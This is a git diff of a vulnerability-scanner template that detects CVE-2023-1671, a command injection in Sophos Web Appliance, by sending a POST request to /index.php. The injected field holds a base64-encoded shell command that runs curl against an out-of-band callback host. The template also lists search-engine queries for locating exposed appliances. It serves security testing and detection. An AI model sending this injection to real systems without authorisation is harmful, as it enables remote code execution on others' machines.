added matcher
parent
d9d9909cd0
commit
19d687cbfe
|
@ -15,12 +15,12 @@ info:
|
||||||
cve-id: CVE-2023-1671
|
cve-id: CVE-2023-1671
|
||||||
cwe-id: CWE-77
|
cwe-id: CWE-77
|
||||||
metadata:
|
metadata:
|
||||||
|
verified: "true"
|
||||||
fofa-query: title="Sophos Web Appliance"
|
fofa-query: title="Sophos Web Appliance"
|
||||||
shodan-query: title:"Sophos Web Appliance"
|
shodan-query: title:"Sophos Web Appliance"
|
||||||
verified: "true"
|
|
||||||
tags: cve,cve2023,rce,sophos
|
tags: cve,cve2023,rce,sophos
|
||||||
|
|
||||||
requests:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
POST /index.php?c=blocked&action=continue HTTP/1.1
|
POST /index.php?c=blocked&action=continue HTTP/1.1
|
||||||
|
@ -28,10 +28,15 @@ requests:
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
User-Agent: curl/7.86.0
|
User-Agent: curl/7.86.0
|
||||||
|
|
||||||
args_reason=filetypewarn&url=1671&filetype=11412&user=15824&user_encoded={{base64("\';curl http://{{interactsh-url}} #")}}
|
args_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64("\';curl http://{{interactsh-url}} #")}}
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol
|
part: interactsh_protocol
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_request
|
||||||
|
words:
|
||||||
|
- "User-Agent: curl"
|
Loading…
Reference in New Issue